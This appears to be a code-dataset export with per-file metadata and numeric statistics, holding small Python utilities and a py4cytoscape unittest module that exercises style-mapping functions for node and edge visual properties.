| 101
| 40.275229
| 0.831564
| 0.042597
| 0
| 0.576471
| 0
| 0
| 0.086232
| 0.021439
| 0
| 0
| 0
| 0
| 0.164706
| 1
| 0.141176
| false
| 0.070588
| 0.058824
| 0
| 0.247059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
8973b150903ddf40bffb9e87cee394e87eaacda0
| 170
|
py
|
Python
|
bitflyer/utils.py
|
tracer0tong/bitflyer
|
6f204ccb5d597908e5f52b32c58cabcc232e67aa
|
[
"MIT"
] | null | null | null |
bitflyer/utils.py
|
tracer0tong/bitflyer
|
6f204ccb5d597908e5f52b32c58cabcc232e67aa
|
[
"MIT"
] | null | null | null |
bitflyer/utils.py
|
tracer0tong/bitflyer
|
6f204ccb5d597908e5f52b32c58cabcc232e67aa
|
[
"MIT"
] | 1
|
2021-05-03T06:50:57.000Z
|
2021-05-03T06:50:57.000Z
|
import time
def make_nonce(micro=False):
    """Return the current unix time (UTC epoch) as a decimal-string nonce.

    Args:
        micro: when False (default) the nonce has one-second resolution,
            matching the original behavior; when True it has microsecond
            resolution, which implements the long-standing TODO and makes
            collisions between rapid successive calls far less likely.

    Returns:
        str: the integer timestamp rendered as a string of digits.
    """
    if micro:
        return str(int(time.time() * 1000000))
    return str(int(time.time()))
| 14.166667
| 42
| 0.6
| 24
| 170
| 4.208333
| 0.583333
| 0.178218
| 0.257426
| 0.336634
| 0.376238
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.294118
| 170
| 11
| 43
| 15.454545
| 0.841667
| 0.447059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9843f3e655a9af93de9a34859bfeb1c451bf6a6e
| 197
|
py
|
Python
|
py_headless_daw/production/producer_interface.py
|
hq9000/py-headless-daw
|
33e08727c25d3f00b2556adf5f25c9f7ff4d4304
|
[
"MIT"
] | 22
|
2020-06-09T18:46:56.000Z
|
2021-09-28T02:11:42.000Z
|
py_headless_daw/production/producer_interface.py
|
hq9000/py-headless-daw
|
33e08727c25d3f00b2556adf5f25c9f7ff4d4304
|
[
"MIT"
] | 19
|
2020-06-03T06:34:57.000Z
|
2021-01-26T07:36:17.000Z
|
py_headless_daw/production/producer_interface.py
|
hq9000/py-headless-daw
|
33e08727c25d3f00b2556adf5f25c9f7ff4d4304
|
[
"MIT"
] | 1
|
2020-06-18T09:25:21.000Z
|
2020-06-18T09:25:21.000Z
|
from abc import ABC, abstractmethod
from py_headless_daw.project.project import Project
class ProducerInterface(ABC):
    """Abstract interface for objects that produce a complete Project."""

    @abstractmethod
    def generate_project(self) -> Project:
        """Build and return a Project instance (implemented by concrete producers)."""
        pass
| 19.7
| 51
| 0.756345
| 23
| 197
| 6.347826
| 0.608696
| 0.232877
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.182741
| 197
| 9
| 52
| 21.888889
| 0.906832
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0.166667
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
984cf93f89b99207240dcec8935c8f7a70d0d98c
| 89
|
py
|
Python
|
sysscribe/disk.py
|
zenotech/SysScribe
|
8cabfc9718e7ccc6d217fbcfc158dd255b28c9b1
|
[
"BSD-3-Clause"
] | null | null | null |
sysscribe/disk.py
|
zenotech/SysScribe
|
8cabfc9718e7ccc6d217fbcfc158dd255b28c9b1
|
[
"BSD-3-Clause"
] | 1
|
2017-05-08T19:18:05.000Z
|
2017-05-08T19:18:05.000Z
|
sysscribe/disk.py
|
zenotech/SysScribe
|
8cabfc9718e7ccc6d217fbcfc158dd255b28c9b1
|
[
"BSD-3-Clause"
] | null | null | null |
from sysscribe import detect_dev_sizes
def disk_sizes():
    # Thin convenience wrapper: delegates to sysscribe.detect_dev_sizes and
    # returns its result unchanged (exact shape defined by that helper).
    return detect_dev_sizes()
| 14.833333
| 38
| 0.786517
| 13
| 89
| 5
| 0.692308
| 0.276923
| 0.430769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157303
| 89
| 5
| 39
| 17.8
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 8
|
98676711ffce9ab6929cf75bbdc1b81ac05284aa
| 78,707
|
py
|
Python
|
tests/test_style_mappings.py
|
bdemchak/py4cytoscape
|
c0f6c13e00928c05485fa2bcc35d292418d3738a
|
[
"MIT"
] | 3
|
2020-05-07T19:51:11.000Z
|
2020-08-12T09:21:43.000Z
|
tests/test_style_mappings.py
|
bdemchak/py4cytoscape
|
c0f6c13e00928c05485fa2bcc35d292418d3738a
|
[
"MIT"
] | 11
|
2020-05-07T15:49:03.000Z
|
2020-08-20T19:57:23.000Z
|
tests/test_style_mappings.py
|
bdemchak/py4cytoscape
|
c0f6c13e00928c05485fa2bcc35d292418d3738a
|
[
"MIT"
] | 3
|
2020-05-26T18:35:57.000Z
|
2020-08-19T09:51:19.000Z
|
# -*- coding: utf-8 -*-
""" Test functions in style_mappings.py.
"""
"""License:
Copyright 2020-2022 The Cytoscape Consortium
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
import pandas as df
import time
from requests import RequestException
from test_utils import *
class StyleMappingsTests(unittest.TestCase):
def setUp(self):
    """Best-effort reset before each test: close any open Cytoscape session.

    Failures are deliberately swallowed so tests still run when no session
    (or no Cytoscape connection) exists yet.
    """
    try:
        close_session(False)
        # delete_all_networks()
    except:
        pass
def tearDown(self):
    """No per-test cleanup is required."""
    pass
# Name of the visual style used throughout these tests — presumably shipped
# with the galFiltered demo session loaded by load_test_session().
_GAL_FILTERED_STYLE = 'galFiltered Style'
@print_entry_exit
def test_map_visual_property(self):
    """Exercise map_visual_property across continuous, discrete and passthrough mappings,
    including bracketed continuous point lists, unknown mapping types, and error cases.
    """
    # Initialization
    load_test_session()

    # Verify continuous property with points list matching color list
    res = map_visual_property('node fill color', 'gal1RGexp', 'c', [-2.426, 0.0, 2.058],
                              ['#0066CC', '#FFFFFF', '#FFFF00'])
    self._check_property(res, 'NODE_FILL_COLOR', 'gal1RGexp', 'Double', 'continuous',
                         [{'value': -2.426, 'lesser': '#0066CC', 'equal': '#0066CC', 'greater': '#0066CC'},
                          {'value': 0.0, 'lesser': '#FFFFFF', 'equal': '#FFFFFF', 'greater': '#FFFFFF'},
                          {'value': 2.058, 'lesser': '#FFFF00', 'equal': '#FFFF00', 'greater': '#FFFF00'}])

    # Verify continuous property with points list bracketed on either side by colors
    # (first/last colors become the below-range/above-range colors)
    res = map_visual_property('node fill color', 'gal1RGexp', 'c', [-2.426, 0.0, 2.058],
                              ['#000000', '#0066CC', '#FFFFFF', '#FFFF00', '#FFFFFF'])
    self._check_property(res, 'NODE_FILL_COLOR', 'gal1RGexp', 'Double', 'continuous',
                         [{'value': -2.426, 'lesser': '#000000', 'equal': '#0066CC', 'greater': '#0066CC'},
                          {'value': 0.0, 'lesser': '#FFFFFF', 'equal': '#FFFFFF', 'greater': '#FFFFFF'},
                          {'value': 2.058, 'lesser': '#FFFF00', 'equal': '#FFFF00', 'greater': '#FFFFFF'}])

    # Verify discrete mapping to two values
    res = map_visual_property('node shape', 'degree.layout', 'd', [1, 2], ['ellipse', 'rectangle'])
    self._check_property(res, 'NODE_SHAPE', 'degree.layout', 'Integer', 'discrete',
                         [{'key': 1, 'value': 'ellipse'}, {'key': 2, 'value': 'rectangle'}])

    # Verify passthru of node string value
    res = map_visual_property('node label', 'COMMON', 'p')
    self._check_property(res, 'NODE_LABEL', 'COMMON', 'String', 'passthrough')

    # Verify passthru of node integer value
    res = map_visual_property('node label', 'degree.layout', 'p')
    self._check_property(res, 'NODE_LABEL', 'degree.layout', 'Integer', 'passthrough')

    # Verify discrete mapping of edge string value
    res = map_visual_property('Edge Target Arrow Shape', 'interaction', 'd', ['pp', 'pd'], ['Arrow', 'T'])
    self._check_property(res, 'EDGE_TARGET_ARROW_SHAPE', 'interaction', 'String', 'discrete',
                         [{'key': 'pp', 'value': 'Arrow'}, {'key': 'pd', 'value': 'T'}])

    # Verify passthru mapping of edge double value
    res = map_visual_property('edge width', 'EdgeBetweenness', 'p')
    self._check_property(res, 'EDGE_WIDTH', 'EdgeBetweenness', 'Double', 'passthrough')

    # Verify that unknown type acts like passthru (the type string is passed through verbatim)
    res = map_visual_property('edge width', 'EdgeBetweenness', 'junktype')
    self._check_property(res, 'EDGE_WIDTH', 'EdgeBetweenness', 'Double', 'junktype')

    # Verify that unknown property, column or bad continuous mapping are caught
    self.assertRaises(CyError, map_visual_property, 'bogus property', 'EdgeBetweenness', 'p')
    self.assertRaises(CyError, map_visual_property, 'edge width', 'bogus column', 'p')
    self.assertRaises(CyError, map_visual_property, 'node fill color', 'gal1RGexp', 'c',
                      [-10.0, -2.426, 0.0, 2.058], ['#0066CC', '#FFFFFF', '#FFFF00'])
@print_entry_exit
def test_get_style_all_mappings(self):
    """Fetch all mappings for the demo style and spot-check each expected property."""
    # Initialization
    load_test_session()

    # Verify that a plausible style can be fetched (... in this case, discrete mapping isn't present)
    res = get_style_all_mappings(self._GAL_FILTERED_STYLE)
    # Re-key the result list by visual property name for order-independent checks
    indexed_properties = {prop['visualProperty']: prop for prop in res}
    self._check_property(indexed_properties['NODE_LABEL'], 'NODE_LABEL', 'COMMON', 'String', 'passthrough')
    self._check_property(indexed_properties['NODE_SIZE'], 'NODE_SIZE', 'degree.layout', 'Number', 'continuous',
                         [{'value': 1.0, 'lesser': '1.0', 'equal': '40.0', 'greater': '40.0'},
                          {'value': 18.0, 'lesser': '150.0', 'equal': '150.0', 'greater': '1.0'}])
    self._check_property(indexed_properties['NODE_FILL_COLOR'], 'NODE_FILL_COLOR', 'gal1RGexp', 'Number',
                         'continuous',
                         [{'value': -2.426, 'lesser': '#0066CC', 'equal': '#0066CC', 'greater': '#0066CC'},
                          {'value': 1.225471493171426e-07, 'lesser': '#FFFFFF', 'equal': '#FFFFFF',
                           'greater': '#FFFFFF'},
                          {'value': 2.058, 'lesser': '#FFFF00', 'equal': '#FFFF00', 'greater': '#FFFF00'}])
    self._check_property(indexed_properties['NODE_LABEL_FONT_SIZE'], 'NODE_LABEL_FONT_SIZE', 'Degree', 'Number',
                         'continuous', [{'value': 1.0, 'lesser': '1', 'equal': '10', 'greater': '10'},
                                        {'value': 18.0, 'lesser': '40', 'equal': '40', 'greater': '1'}])

    # Verify that an invalid style is caught
    self.assertRaises(CyError, get_style_all_mappings, 'bogus style')
@print_entry_exit
def test_get_style_mapping(self):
    """Verify that fetching each mapping individually agrees with the fetch-all result."""
    # Initialization
    load_test_session()

    # Get all of the properties in a list
    res = get_style_all_mappings(self._GAL_FILTERED_STYLE)
    indexed_properties = {prop['visualProperty']: prop for prop in res}

    # Fetch each property and verify it matches the one in the list
    for prop_name in indexed_properties:
        res = get_style_mapping(self._GAL_FILTERED_STYLE, prop_name)
        indexed_prop = indexed_properties[prop_name]
        # Discrete mappings carry 'map', continuous ones carry 'points',
        # passthrough mappings carry neither — normalize to a single payload.
        cargo = indexed_prop['map'] if 'map' in indexed_prop else \
            indexed_prop['points'] if 'points' in indexed_prop else \
            None
        self._check_property(res, indexed_prop['visualProperty'], indexed_prop['mappingColumn'],
                             indexed_prop['mappingColumnType'], indexed_prop['mappingType'], cargo)

    # Verify that an invalid style or property is caught
    self.assertRaises(CyError, get_style_mapping, 'bogus style', 'NODE_SIZE')
    self.assertRaises(CyError, get_style_mapping, self._GAL_FILTERED_STYLE, 'bogus property')
@print_entry_exit
def test_delete_style_mapping(self):
    """Delete one mapping and verify only that mapping disappears from the style."""
    # Initialization
    load_test_session()

    # Get all of the properties in a list and delete the first one
    all_props = get_style_all_mappings(self._GAL_FILTERED_STYLE)
    prop_to_delete = all_props[0]['visualProperty']
    res = delete_style_mapping(self._GAL_FILTERED_STYLE, prop_to_delete)
    self.assertEqual(res, '')

    # Verify that after the delete, the style is no longer present
    remaining_props = get_style_all_mappings(self._GAL_FILTERED_STYLE)
    del all_props[0]
    self.assertListEqual(all_props, remaining_props)

    # Verify that an invalid style or property is caught
    # NOTE(review): bogus style raises, but a bogus property apparently just
    # returns None — asymmetry is per py4cytoscape behavior, not a test bug.
    self.assertRaises(CyError, delete_style_mapping, 'bogus style', prop_to_delete)
    self.assertIsNone(delete_style_mapping(self._GAL_FILTERED_STYLE, 'bogus property'))
@unittest.skip('NODE_LABEL doesnt seem to exist ... maybe because of a timing race condition??')
@print_entry_exit
def test_update_style_mapping(self):
    """Replace, delete and re-add the NODE_LABEL mapping (currently skipped —
    re-adding intermittently fails, suspected Cytoscape timing issue)."""
    # Initialization
    load_test_session()

    # Replace the existing NODE_LABEL property with a different one, and verify that it was replaced
    existing_prop = get_style_mapping(self._GAL_FILTERED_STYLE, 'NODE_LABEL')
    new_prop = map_visual_property('NODE_LABEL', 'name', 'p')
    self.assertEqual(update_style_mapping(self._GAL_FILTERED_STYLE, new_prop), '')
    replaced_prop = get_style_mapping(self._GAL_FILTERED_STYLE, 'NODE_LABEL')
    self._check_property(replaced_prop, 'NODE_LABEL', 'name', 'String', 'passthrough')

    # Remove the NODE_LABEL property, verify it's removed, then re-add the original property and verify
    self.assertEqual(delete_style_mapping(self._GAL_FILTERED_STYLE, 'NODE_LABEL'), '')
    self.assertRaises(CyError, get_style_mapping, self._GAL_FILTERED_STYLE, 'NODE_LABEL')
    # WARNING: This update often fails silently, which causes the get_style_mapping to fail [Cytoscape BUG]
    self.assertEqual(update_style_mapping(self._GAL_FILTERED_STYLE, existing_prop), '')
    ### Failed ... NODE_LABEL doesn't seem to exist ... maybe because of a timing race condition??
    readded_prop = get_style_mapping(self._GAL_FILTERED_STYLE, 'NODE_LABEL')
    self._check_property(readded_prop, existing_prop['visualProperty'], existing_prop['mappingColumn'],
                         existing_prop['mappingColumnType'], existing_prop['mappingType'])

    # Verify that an invalid style or property is caught
    self.assertRaises(CyError, update_style_mapping, 'bogus style', new_prop)
    self.assertRaises(TypeError, update_style_mapping, self._GAL_FILTERED_STYLE, 'bogus property')
@print_entry_exit
def test_set_node_border_color_mapping(self):
    """Drive the shared _check_set_node_property harness for set_node_border_color_mapping
    (continuous/discrete/passthrough cases plus bad-color and short-list errors)."""
    _NEW_DEFAULT = '#654321'
    _PASSTHRU_VAL = '#123456'
    self._check_set_node_property({'prop_func': set_node_border_color_mapping,
                                   'prop_name': 'NODE_BORDER_PAINT',
                                   'new_default': _NEW_DEFAULT,
                                   'set_default': 'p',
                                   'passthru_val': _PASSTHRU_VAL,
                                   # 'compare_tolerance_percent': 0,
                                   'cont_test_params': {'colors': ['#FBE723', '#440256']},
                                   # 'cont_no_map_params': {'mapping_type': 'c'},
                                   'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},
                                   'cont_short_map_params': {'colors': ['#440256']},
                                   'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
                                   # 'disc_no_map_params': {'mapping_type': 'd'},
                                   'pass_test_params': {'default_color': _NEW_DEFAULT, 'mapping_type': 'p'},
                                   # 'pass_no_map_params': {'mapping_type': 'p'},
                                   'invalid_map_params': {'mapping_type': 'X'},
                                   'exception_check_params': {'mapping_type': 'p'},
                                   })
@print_entry_exit
def test_set_node_border_opacity_mapping(self):
    """Drive the shared _check_set_node_property harness for set_node_border_opacity_mapping
    (opacity 550 is out of range and exercises the bad-map error path)."""
    _NEW_DEFAULT = 225
    _PASSTHRU_VAL = 250
    self._check_set_node_property({'prop_func': set_node_border_opacity_mapping,
                                   'prop_name': 'NODE_BORDER_TRANSPARENCY',
                                   'new_default': _NEW_DEFAULT,
                                   'set_default': 'p',
                                   'passthru_val': _PASSTHRU_VAL,
                                   # 'compare_tolerance_percent': 0,
                                   'cont_test_params': {'opacities': [50, 100]},
                                   # 'cont_no_map_params': {'mapping_type': 'c'},
                                   'cont_bad_map_params': {'opacities': [550, 100]},
                                   'cont_short_map_params': {'opacities': [50]},
                                   'disc_test_params': {'opacities': [50, 100], 'mapping_type': 'd'},
                                   # 'disc_no_map_params': {'mapping_type': 'd'},
                                   'pass_test_params': {'default_opacity': _NEW_DEFAULT, 'mapping_type': 'p'},
                                   # 'pass_no_map_params': {'mapping_type': 'p'},
                                   'invalid_map_params': {'mapping_type': 'X'},
                                   'exception_check_params': {'mapping_type': 'p'},
                                   })
@print_entry_exit
def test_set_node_border_width_mapping(self):
    """Drive the shared _check_set_node_property harness for set_node_border_width_mapping
    (no bad-map case: width values are not bounds-checked by the API)."""
    _NEW_DEFAULT = 4
    _PASSTHRU_VAL = 3
    self._check_set_node_property({'prop_func': set_node_border_width_mapping,
                                   'prop_name': 'NODE_BORDER_WIDTH',
                                   'new_default': _NEW_DEFAULT,
                                   'set_default': 'p',
                                   'passthru_val': _PASSTHRU_VAL,
                                   # 'compare_tolerance_percent': 0,
                                   'cont_test_params': {'widths': [5, 10]},
                                   # 'cont_no_map_params': {'mapping_type': 'c'},
                                   # 'cont_bad_map_params': {'width': [550, 100]}, ... no bounds checking for this property
                                   'cont_short_map_params': {'widths': [5]},
                                   'disc_test_params': {'widths': [5, 10], 'mapping_type': 'd'},
                                   # 'disc_no_map_params': {'mapping_type': 'd'},
                                   'pass_test_params': {'default_width': _NEW_DEFAULT, 'mapping_type': 'p'},
                                   # 'pass_no_map_params': {'mapping_type': 'p'},
                                   'invalid_map_params': {'mapping_type': 'X'},
                                   'exception_check_params': {'mapping_type': 'p'},
                                   })
@print_entry_exit
def test_set_node_color_mapping(self):
    """Drive the shared _check_set_node_property harness for set_node_color_mapping
    ('#FBE72' is a malformed 5-digit color exercising the bad-map error path)."""
    _NEW_DEFAULT = '#654321'
    _PASSTHRU_VAL = '#123456'
    self._check_set_node_property({'prop_func': set_node_color_mapping,
                                   'prop_name': 'NODE_FILL_COLOR',
                                   'new_default': _NEW_DEFAULT,
                                   'set_default': 'p',
                                   'passthru_val': _PASSTHRU_VAL,
                                   # 'compare_tolerance_percent': 0,
                                   'cont_test_params': {'colors': ['#FBE723', '#440256']},
                                   # 'cont_no_map_params': {'mapping_type': 'c'},
                                   'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},
                                   'cont_short_map_params': {'colors': ['#440256']},
                                   'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
                                   # 'disc_invalid_map_params': {'mapping_type': 'd'},
                                   'pass_test_params': {'default_color': _NEW_DEFAULT, 'mapping_type': 'p'},
                                   # 'pass_invalid_map_params': {'mapping_type': 'p'},
                                   'invalid_map_params': {'mapping_type': 'X'},
                                   'exception_check_params': {'mapping_type': 'p'},
                                   })
@print_entry_exit
def test_set_node_combo_opacity_mapping(self):
    """Exercise set_node_combo_opacity_mapping, which drives three transparency properties at once."""
    new_default = 225
    self._check_set_node_property({
        'prop_func': set_node_combo_opacity_mapping,
        'prop_name': ['NODE_TRANSPARENCY', 'NODE_BORDER_TRANSPARENCY',
                      'NODE_LABEL_TRANSPARENCY'],
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': 250,
        'cont_test_params': {'opacities': [50, 100]},
        'cont_bad_map_params': {'opacities': [550, 100]},  # 550 is out of the 0..255 range
        'cont_short_map_params': {'opacities': [50]},
        'disc_test_params': {'opacities': [50, 100], 'mapping_type': 'd'},
        'pass_test_params': {'default_opacity': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_node_fill_opacity_mapping(self):
    """Exercise set_node_fill_opacity_mapping for continuous, discrete and passthru mappings."""
    new_default = 225
    self._check_set_node_property({
        'prop_func': set_node_fill_opacity_mapping,
        'prop_name': 'NODE_TRANSPARENCY',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': 250,
        'cont_test_params': {'opacities': [50, 100]},
        'cont_bad_map_params': {'opacities': [550, 100]},  # 550 is out of the 0..255 range
        'cont_short_map_params': {'opacities': [50]},
        'disc_test_params': {'opacities': [50, 100], 'mapping_type': 'd'},
        'pass_test_params': {'default_opacity': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_node_font_face_mapping(self):
    """Exercise set_node_font_face_mapping; continuous mapping is unsupported for fonts."""
    new_default = 'Dialog.bold,bold,12'
    self._check_set_node_property({
        'prop_func': set_node_font_face_mapping,
        'prop_name': 'NODE_LABEL_FONT_FACE',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': 'Dialog.italic,plain,12',
        # Fonts can't be continuously interpolated, so 'c' must raise instead.
        'cont_no_map_params': {'mapping_type': 'c'},
        'disc_test_params': {'fonts': ['Arial,plain,12', 'Arial Bold,bold,12'],
                             'mapping_type': 'd'},
        'pass_test_params': {'default_font': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_node_font_size_mapping(self):
    """Exercise set_node_font_size_mapping for continuous, discrete and passthru mappings."""
    new_default = 20
    self._check_set_node_property({
        'prop_func': set_node_font_size_mapping,
        'prop_name': 'NODE_LABEL_FONT_SIZE',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': 40,
        'cont_test_params': {'sizes': [20, 80]},
        'cont_short_map_params': {'sizes': [20]},
        'disc_test_params': {'sizes': [40, 90], 'mapping_type': 'd'},
        'pass_test_params': {'default_size': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_node_height_mapping(self):
    """Exercise set_node_height_mapping; heights are compared with a small tolerance."""
    new_default = 120
    self._check_set_node_property({
        'prop_func': set_node_height_mapping,
        'prop_name': 'NODE_HEIGHT',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': 140,
        # Cytoscape may round calculated heights, so allow 2% slack on comparisons.
        'compare_tolerance_percent': 2,
        'cont_test_params': {'heights': [120, 180]},
        'cont_short_map_params': {'heights': [120]},
        'disc_test_params': {'heights': [140, 190], 'mapping_type': 'd'},
        'pass_test_params': {'default_height': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_node_label_mapping(self):
    """Exercise set_node_label_mapping; labels support only a passthru mapping."""
    self._check_set_node_property({
        'prop_func': set_node_label_mapping,
        'prop_name': 'NODE_LABEL',
        'passthru_val': 'name',
        'pass_test_params': {},
        'exception_check_params': {},
    })
@print_entry_exit
def test_set_node_label_color_mapping(self):
    """Exercise set_node_label_color_mapping for continuous, discrete and passthru mappings."""
    new_default = '#654321'
    self._check_set_node_property({
        'prop_func': set_node_label_color_mapping,
        'prop_name': 'NODE_LABEL_COLOR',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': '#123456',
        'cont_test_params': {'colors': ['#FBE723', '#440256']},
        'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},  # malformed hex color
        'cont_short_map_params': {'colors': ['#440256']},
        'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
        'pass_test_params': {'default_color': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_node_label_opacity_mapping(self):
    """Exercise set_node_label_opacity_mapping for continuous, discrete and passthru mappings."""
    new_default = 225
    self._check_set_node_property({
        'prop_func': set_node_label_opacity_mapping,
        'prop_name': 'NODE_LABEL_TRANSPARENCY',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': 250,
        'cont_test_params': {'opacities': [50, 100]},
        'cont_bad_map_params': {'opacities': [550, 100]},  # 550 is out of the 0..255 range
        'cont_short_map_params': {'opacities': [50]},
        'disc_test_params': {'opacities': [50, 100], 'mapping_type': 'd'},
        'pass_test_params': {'default_opacity': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_node_shape_mapping(self):
    """Exercise set_node_shape_mapping; shapes support only a discrete mapping."""
    new_default = 'PARALLELOGRAM'
    self._check_set_node_property({
        'prop_func': set_node_shape_mapping,
        'prop_name': 'NODE_SHAPE',
        'new_default': new_default,
        'set_default': 'd',
        'disc_test_params': {'shapes': ['OCTAGON', 'TRIANGLE'],
                             'default_shape': new_default},
        'exception_check_params': {},
    })
@unittest.skip('Fetching NODE_SIZE always returns the default node size instead of the current node size')
@print_entry_exit
def test_set_node_size_mapping(self):
    """Exercise set_node_size_mapping (currently skipped -- see decorator)."""
    new_default = 80
    # NOTE(review): the short-map case uses [120], which doesn't match the
    # cont_test_params range [60, 100] -- presumably intentional since any
    # one-element list is "too short"; confirm.
    self._check_set_node_property({
        'prop_func': set_node_size_mapping,
        'prop_name': 'NODE_SIZE',
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': 20,
        'cont_test_params': {'sizes': [60, 100]},
        'cont_short_map_params': {'sizes': [120]},
        'disc_test_params': {'sizes': [60, 80], 'mapping_type': 'd'},
        'pass_test_params': {'default_size': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
def test_set_node_tooltip_mapping(self):
    """Exercise set_node_tooltip_mapping; tooltips support only a passthru mapping."""
    # TODO: This fails because of a race condition when reading the tooltip immediately after setting it
    self._check_set_node_property({
        'prop_func': set_node_tooltip_mapping,
        'prop_name': 'NODE_TOOLTIP',
        'passthru_val': 'tooltip text',
        'pass_test_params': {},
        'exception_check_params': {},
    })
@print_entry_exit
def test_set_node_width_mapping(self):
    """Exercise set_node_width_mapping; the default is verified via the continuous mapping."""
    new_default = 120
    self._check_set_node_property({
        'prop_func': set_node_width_mapping,
        'prop_name': 'NODE_WIDTH',
        'new_default': new_default,
        'set_default': 'c',
        'passthru_val': 140,
        # Widths are calculated by Cytoscape, so allow generous slack on comparisons.
        'compare_tolerance_percent': 20,
        'cont_test_params': {'widths': [120, 180]},
        'cont_short_map_params': {'widths': [120]},
        'disc_test_params': {'widths': [140, 190], 'mapping_type': 'd'},
        'pass_test_params': {'default_width': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@unittest.skip('Unknown interaction between the two properties and the "Edge color to arrows" check box')
@print_entry_exit
def test_set_edge_color_mapping(self):
    """Exercise set_edge_color_mapping, which drives two paint properties (currently skipped)."""
    new_default = '#654321'
    self._check_set_edge_property({
        'prop_func': set_edge_color_mapping,
        'prop_name': ['EDGE_UNSELECTED_PAINT', 'EDGE_STROKE_UNSELECTED_PAINT'],
        'new_default': new_default,
        'set_default': 'p',
        'passthru_val': '#123456',
        'cont_test_params': {'colors': ['#FBE723', '#440256']},
        'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},  # malformed hex color
        'cont_short_map_params': {'colors': ['#440256']},
        'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
        'pass_test_params': {'default_color': new_default, 'mapping_type': 'p'},
        'invalid_map_params': {'mapping_type': 'X'},
        'exception_check_params': {'mapping_type': 'p'},
    })
@print_entry_exit
